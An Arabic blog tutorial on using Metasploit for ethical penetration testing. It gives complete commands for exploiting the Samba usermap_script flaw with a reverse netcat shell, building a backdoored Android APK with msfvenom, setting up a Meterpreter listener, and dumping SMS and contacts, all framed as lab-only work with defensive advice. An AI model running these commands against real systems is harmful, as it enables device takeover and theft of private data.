JavaScript is not enabled!...Please enable javascript in your browser

جافا سكريبت غير ممكن! ... الرجاء تفعيل الجافا سكريبت في متصفحك.

-->
Startseite

🧨 مدخل عملي إلى أداة Metasploit: دليلك لاختبار الاختراق الأخلاقي في 2025

Metasploit Framework هي واحدة من أقوى الأدوات في عالم الأمن السيبراني، وتُستخدم بشكل واسع من طرف خبراء اختبار الاختراق (Penetration Testers) والهكر الأخلاقيين في تقييم أمان الأنظمة والشبكات. في هذا المقال، سنقوم بتقديم شرح عملي لأداة Metasploit، مع مثال تطبيقي لاختراق جهاز وهمي، ثم نستعرض كيفية إنشاء Backdoor باستخدام msfvenom، اختراق جهاز Android وهمي، تحليل التقارير، وأخيراً نصائح الحماية.


🛠️ ما هي Metasploit؟

Metasploit هي بيئة اختبار اختراق مفتوحة المصدر تحتوي على مكتبة ضخمة من الأدوات والثغرات الجاهزة للاستغلال (Exploits)، والحملات (Payloads)، والمستمعات (Listeners).

مميزات Metasploit:
  • آلاف الثغرات الجاهزة للاستغلال.
  • دعم لأنظمة Windows وLinux وAndroid.
  • إمكانية توليد Backdoors وShells بسهولة.
  • دعم لاختبار الشبكات والخدمات وقواعد البيانات.
🔗 الموقع الرسمي: metasploit.com

💻 تثبيت Metasploit

📥 على Kali Linux:

Metasploit يأتي مثبتًا بشكل افتراضي في توزيعة Kali Linux.

🔧 على أنظمة أخرى:

curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
chmod +x msfinstall
./msfinstall

🚀 فتح أداة Metasploit

msfconsole

بعد ثوانٍ، ستظهر لك واجهة Metasploit في وضع سطر الأوامر، بها شعار التنين الشهير.


🎯 مشروع تطبيقي: استغلال ثغرة Samba على جهاز وهمي

1️⃣ إعداد الهدف:

  • استخدم جهاز وهمي (مثلاً: Metasploitable2 أو Ubuntu فيه خدمة Samba).
  • اجعل جهاز Kali وهدفك في نفس الشبكة (مثلاً عبر VirtualBox Network - Bridged أو Host-Only).
  • احصل على IP الهدف عبر الأمر: ifconfig

2️⃣ تشغيل Metasploit:

msfconsole

3️⃣ البحث عن ثغرة:

search samba

4️⃣ اختيار الثغرة المناسبة:

use exploit/multi/samba/usermap_script

5️⃣ إعداد المعلمات:

set RHOSTS 192.168.1.100
set LHOST 192.168.1.101
set LPORT 4444
set PAYLOAD cmd/unix/reverse_netcat

6️⃣ تنفيذ الهجوم:

exploit

✅ النتيجة:

إذا كانت الثغرة ناجحة، ستحصل على جلسة (Session) من نوع Shell في جهاز الهدف، ويمكنك تنفيذ أوامر بداخله:

uname -a
id
ls -la

🔐 إنشاء Backdoor باستخدام msfvenom

Msfvenom هي أداة مدمجة مع Metasploit تُستخدم لإنشاء حملات خبيثة (Payloads) مثل Backdoors يمكن نشرها على الأجهزة المستهدفة.

1️⃣ إنشاء ملف Backdoor بصيغة APK لأجهزة Android:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -o /root/backdoor.apk

2️⃣ إعداد Metasploit لاستقبال الاتصال:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 4444
exploit

3️⃣ إرسال ملف Backdoor إلى الجهاز الهدف وتشغيله (تجريبي فقط على جهاز وهمي).


🤖 اختراق جهاز Android وهمي

  • استخدم محاكي Android مثل Genymotion أو Android Studio.
  • ثبّت ملف backdoor.apk على المحاكي.
  • شغل الملف، وانتظر اتصال Meterpreter في Metasploit.
  • يمكنك الآن التحكم في الجهاز عن بعد باستخدام أوامر Meterpreter مثل: sysinfo، shell، dump_sms.

🧠 تحليل التقارير بعد الاختراق

بعد الحصول على جلسة Meterpreter، يمكنك جمع معلومات مفصلة عن الجهاز المستهدف وتحليلها:

  • sysinfo: معلومات النظام.
  • getuid: المستخدم الحالي.
  • ipconfig: إعدادات الشبكة.
  • dump_contacts: استخراج جهات الاتصال.
  • screenshare: عرض شاشة الجهاز في الوقت الحقيقي.

تُستخدم هذه المعلومات لفهم مستوى التحكم وإمكانية التصدي للهجمات لاحقًا.


🔐 حماية النظام ضد هذه الهجمات

  • تحديث نظام التشغيل والتطبيقات بانتظام.
  • عدم تثبيت تطبيقات من مصادر غير موثوقة.
  • استخدام برامج الحماية ومكافحة الفيروسات.
  • تفعيل ميزات الحماية في أندرويد مثل Play Protect.
  • تجنب تشغيل ملفات APK مجهولة المصدر.
  • استخدام جدران حماية وحلول مراقبة الشبكة.

✅ الخاتمة

Metasploit مع msfvenom توفران بيئة قوية لاختبار الاختراق الأخلاقي من خلال بناء هجمات واقعية في بيئة آمنة. فهم هذه الأدوات يمكن أن يحسن بشكل كبير من مهارات الحماية والدفاع السيبراني.

⚠️ تذكير مهم: لا تستخدم هذه الأدوات على أجهزة أو شبكات لا تملكها أو ليس لديك تصريح صريح لفحصها، لأن ذلك غير قانوني ويعرضك للمسائلة.

NameE-MailNachricht